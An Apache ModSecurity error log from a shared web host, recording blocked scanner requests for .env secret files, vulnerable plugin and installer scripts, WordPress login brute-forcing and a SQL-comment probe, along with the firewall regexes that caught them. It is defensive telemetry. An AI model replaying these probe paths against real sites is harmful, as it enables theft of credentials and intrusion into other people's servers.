[Tue May 26 15:13:55.435731 2026] [security2:error] [pid 686593:tid 686726] [client 2.57.122.173:37594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/secrets/.env"] [unique_id "ahVrW-ilgkZcvx0_tl_EiQAAAIg"]
[Tue May 26 15:13:55.557521 2026] [proxy_http:error] [pid 686593:tid 686755] [client 23.94.40.119:44070] AH01086: read less bytes of request body than expected (got 154502, expected 206136)
[Tue May 26 15:13:55.557544 2026] [proxy_http:error] [pid 686593:tid 686755] [client 23.94.40.119:44070] AH01097: pass request body failed to 127.0.0.1:2095 (127.0.0.1) from 23.94.40.119 ()
[Tue May 26 15:13:55.762810 2026] [security2:error] [pid 686593:tid 686811] [client 23.94.40.119:44130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ahVrW-ilgkZcvx0_tl_ElQAAAN0"]
[Tue May 26 15:13:55.933979 2026] [security2:error] [pid 686593:tid 686766] [client 23.94.40.119:44140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php"] [unique_id "ahVrW-ilgkZcvx0_tl_EmwAAALA"]
[Tue May 26 15:13:56.267667 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:44146] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "d8amm1s38nd4i2uf1a90tqrgc6umtga7c.oast.site"] [uri "/-/jira/login/oauth/access_token"] [unique_id "ahVrXOilgkZcvx0_tl_EpAAAAL8"]
[Tue May 26 15:13:56.267797 2026] [security2:error] [pid 686593:tid 686781] [client 23.94.40.119:44146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "d8amm1s38nd4i2uf1a90tqrgc6umtga7c.oast.site"] [uri "/-/jira/login/oauth/access_token"] [unique_id "ahVrXOilgkZcvx0_tl_EpAAAAL8"]
[Tue May 26 15:13:56.354864 2026] [security2:error] [pid 686593:tid 686732] [client 23.94.40.119:44144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVrXOilgkZcvx0_tl_EqQAAAI4"]
[Tue May 26 15:13:56.519895 2026] [security2:error] [pid 686593:tid 686836] [client 23.94.40.119:44212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/photo/p/api/album.php"] [unique_id "ahVrXOilgkZcvx0_tl_EtAAAAPY"]
[Tue May 26 15:13:56.630129 2026] [security2:error] [pid 686593:tid 686832] [client 23.94.40.119:44226] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/photo/p/api/album.php"] [unique_id "ahVrXOilgkZcvx0_tl_EuAAAAPI"]
[Tue May 26 15:13:56.731454 2026] [security2:error] [pid 686593:tid 686809] [client 23.94.40.119:44220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/photo/p/api/album.php"] [unique_id "ahVrXOilgkZcvx0_tl_EuQAAANs"]
[Tue May 26 15:13:56.787201 2026] [security2:error] [pid 686593:tid 686840] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrXOilgkZcvx0_tl_ErQAAAPo"]
[Tue May 26 15:13:56.974469 2026] [security2:error] [pid 686593:tid 686755] [client 2.57.122.173:55604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/secrets/.env"] [unique_id "ahVrXOilgkZcvx0_tl_ExAAAAKU"]
[Tue May 26 15:13:57.348102 2026] [security2:error] [pid 686593:tid 686768] [client 23.94.40.119:44236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/card_scan.php"] [unique_id "ahVrXeilgkZcvx0_tl_E0QAAALI"]
[Tue May 26 15:13:57.487494 2026] [security2:error] [pid 686593:tid 686806] [client 2.57.122.173:55586] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrXOilgkZcvx0_tl_EwQAAANg"]
[Tue May 26 15:13:57.509150 2026] [security2:error] [pid 686593:tid 686740] [client 2.57.122.173:55596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrXOilgkZcvx0_tl_EwgAAAJY"]
[Tue May 26 15:13:58.743812 2026] [security2:error] [pid 686593:tid 686845] [client 2.57.122.173:38854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/.env"] [unique_id "ahVrXuilgkZcvx0_tl_E_AAAAP8"]
[Tue May 26 15:13:59.008034 2026] [security2:error] [pid 686593:tid 686797] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrXuilgkZcvx0_tl_E-wAAAM8"]
[Tue May 26 15:13:59.048343 2026] [security2:error] [pid 686593:tid 686837] [client 2.57.122.173:38870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrXuilgkZcvx0_tl_FDAAAAPc"]
[Tue May 26 15:13:59.280297 2026] [security2:error] [pid 686593:tid 686725] [client 45.177.80.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrXuilgkZcvx0_tl_FAwAAAIc"]
[Tue May 26 15:14:00.300575 2026] [security2:error] [pid 686593:tid 686740] [client 23.94.40.119:59004] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "webmail.pronumbers.com.au"] [uri "/search/"] [unique_id "ahVrYOilgkZcvx0_tl_FKwAAAJY"]
[Tue May 26 15:14:00.448307 2026] [security2:error] [pid 686593:tid 686768] [client 2.57.122.173:38884] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.dimensioncorporativa.jhonweb.com"] [uri "/index.php"] [unique_id "ahVrYOilgkZcvx0_tl_FLAAAALI"]
[Tue May 26 15:14:00.568800 2026] [security2:error] [pid 686593:tid 686823] [client 23.94.40.119:59008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrYOilgkZcvx0_tl_FOAAAAOk"]
[Tue May 26 15:14:00.787927 2026] [security2:error] [pid 686593:tid 686735] [client 23.94.40.119:59022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/index.php"] [unique_id "ahVrYOilgkZcvx0_tl_FQwAAAJE"]
[Tue May 26 15:14:00.797862 2026] [core:error] [pid 686593:tid 686766] [client 74.7.230.3:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:14:00.797882 2026] [core:error] [pid 686593:tid 686766] [client 74.7.230.3:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:14:00.798016 2026] [security2:error] [pid 686593:tid 686766] [client 74.7.230.3:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "training.mosykay.com"] [uri "/index.php"] [unique_id "ahVrYOilgkZcvx0_tl_FRAAAALA"]
[Tue May 26 15:14:00.802794 2026] [security2:error] [pid 686593:tid 686829] [client 74.7.230.3:33266] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "training.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVrYOilgkZcvx0_tl_FQQAA70s"]
[Tue May 26 15:14:01.146535 2026] [security2:error] [pid 686593:tid 686836] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrYOilgkZcvx0_tl_FQAAAAPY"]
[Tue May 26 15:14:01.490258 2026] [security2:error] [pid 686593:tid 686821] [client 23.94.40.119:59034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php/connector.minimal.php"] [unique_id "ahVrYeilgkZcvx0_tl_FVQAAAOc"]
[Tue May 26 15:14:03.252867 2026] [security2:error] [pid 686593:tid 686841] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrYuilgkZcvx0_tl_FfgAAAPs"]
[Tue May 26 15:14:04.098422 2026] [security2:error] [pid 686593:tid 686842] [client 23.94.40.119:59046] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/autodiscover"] [unique_id "ahVrZOilgkZcvx0_tl_FlQAAAPw"]
[Tue May 26 15:14:04.633763 2026] [security2:error] [pid 686593:tid 686754] [client 85.121.240.156:43008] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrZOilgkZcvx0_tl_FowAAAKQ"]
[Tue May 26 15:14:04.771504 2026] [security2:error] [pid 686593:tid 686761] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrZOilgkZcvx0_tl_FoAAAAKs"]
[Tue May 26 15:14:05.278064 2026] [security2:error] [pid 686593:tid 686819] [client 23.94.40.119:59098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/include/plugin/payment/alipay/pay.php"] [unique_id "ahVrZeilgkZcvx0_tl_FuAAAAOU"]
[Tue May 26 15:14:07.118931 2026] [security2:error] [pid 686593:tid 686767] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrZuilgkZcvx0_tl_F7wAAALE"]
[Tue May 26 15:14:07.314979 2026] [security2:error] [pid 686593:tid 686800] [client 23.94.40.119:59170] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/seo-by-rank-math/readme.txt"] [unique_id "ahVrZ-ilgkZcvx0_tl_F-wAAANI"]
[Tue May 26 15:14:07.477641 2026] [security2:error] [pid 686593:tid 686738] [client 23.94.40.119:59182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ahVrZ-ilgkZcvx0_tl_F_wAAAJQ"]
[Tue May 26 15:14:07.514486 2026] [security2:error] [pid 686593:tid 686762] [client 23.94.40.119:59188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/mailingupgrade.php"] [unique_id "ahVrZ-ilgkZcvx0_tl_GAAAAAKw"]
[Tue May 26 15:14:07.834855 2026] [security2:error] [pid 686593:tid 686837] [client 45.205.1.28:62004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahVrZ-ilgkZcvx0_tl_GBAAAAPc"]
[Tue May 26 15:14:09.044095 2026] [security2:error] [pid 686593:tid 686808] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVraOilgkZcvx0_tl_GHwAAANo"]
[Tue May 26 15:14:11.068131 2026] [security2:error] [pid 686593:tid 686757] [client 178.250.7.100:63147] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVrauilgkZcvx0_tl_GYwAAAKc"]
[Tue May 26 15:14:11.459810 2026] [security2:error] [pid 686593:tid 686819] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVra-ilgkZcvx0_tl_GZgAAAOU"]
[Tue May 26 15:14:13.666743 2026] [security2:error] [pid 686593:tid 686607] [remote 84.247.181.196:37006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVrbeilgkZcvx0_tl_GugAA0A0"]
[Tue May 26 15:14:13.861266 2026] [security2:error] [pid 686593:tid 686799] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrbeilgkZcvx0_tl_GtgAAANE"]
[Tue May 26 15:14:14.116569 2026] [security2:error] [pid 686593:tid 686814] [client 23.94.40.119:52330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/installer/index.php"] [unique_id "ahVrbuilgkZcvx0_tl_G2QAAAOA"]
[Tue May 26 15:14:14.465956 2026] [security2:error] [pid 686593:tid 686783] [client 23.94.40.119:52348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/roundcube/installer/index.php"] [unique_id "ahVrbuilgkZcvx0_tl_G4gAAAME"]
[Tue May 26 15:14:14.629415 2026] [security2:error] [pid 686593:tid 686827] [client 23.94.40.119:52352] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVrbuilgkZcvx0_tl_G5gAAAO0"]
[Tue May 26 15:14:15.185070 2026] [security2:error] [pid 686593:tid 686619] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVrb-ilgkZcvx0_tl_HEAAAphk"]
[Tue May 26 15:14:15.537701 2026] [security2:error] [pid 686593:tid 686803] [client 43.173.181.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HKQAAANU"]
[Tue May 26 15:14:15.690291 2026] [security2:error] [pid 686593:tid 686782] [client 85.121.240.156:56446] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HLQAAAMA"]
[Tue May 26 15:14:16.256737 2026] [security2:error] [pid 686593:tid 686845] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HMQAAAP8"]
[Tue May 26 15:14:16.454905 2026] [security2:error] [pid 686593:tid 686825] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HCwAAAOs"]
[Tue May 26 15:14:16.457578 2026] [security2:error] [pid 686593:tid 686644] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.env"] [unique_id "ahVrb-ilgkZcvx0_tl_HTAAApjI"]
[Tue May 26 15:14:16.458232 2026] [security2:error] [pid 686593:tid 686658] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.preetishah.moes-art.com"] [uri "/*update.cgi*"] [unique_id "ahVrb-ilgkZcvx0_tl_HSQAApkA"]
[Tue May 26 15:14:16.459826 2026] [security2:error] [pid 686593:tid 686658] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.docker/.env"] [unique_id "ahVrb-ilgkZcvx0_tl_HTgAApkA"]
[Tue May 26 15:14:16.464764 2026] [security2:error] [pid 686593:tid 686779] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HDgAAAL0"]
[Tue May 26 15:14:16.469838 2026] [security2:error] [pid 686593:tid 686830] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HEgAAAPA"]
[Tue May 26 15:14:16.473384 2026] [security2:error] [pid 686593:tid 686811] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HEwAAAN0"]
[Tue May 26 15:14:16.478490 2026] [security2:error] [pid 686593:tid 686843] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVrb-ilgkZcvx0_tl_HCgAAAP0"]
[Tue May 26 15:14:16.734934 2026] [security2:error] [pid 686593:tid 686705] [remote 45.148.10.95:28928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVrcOilgkZcvx0_tl_HXQAApm8"]
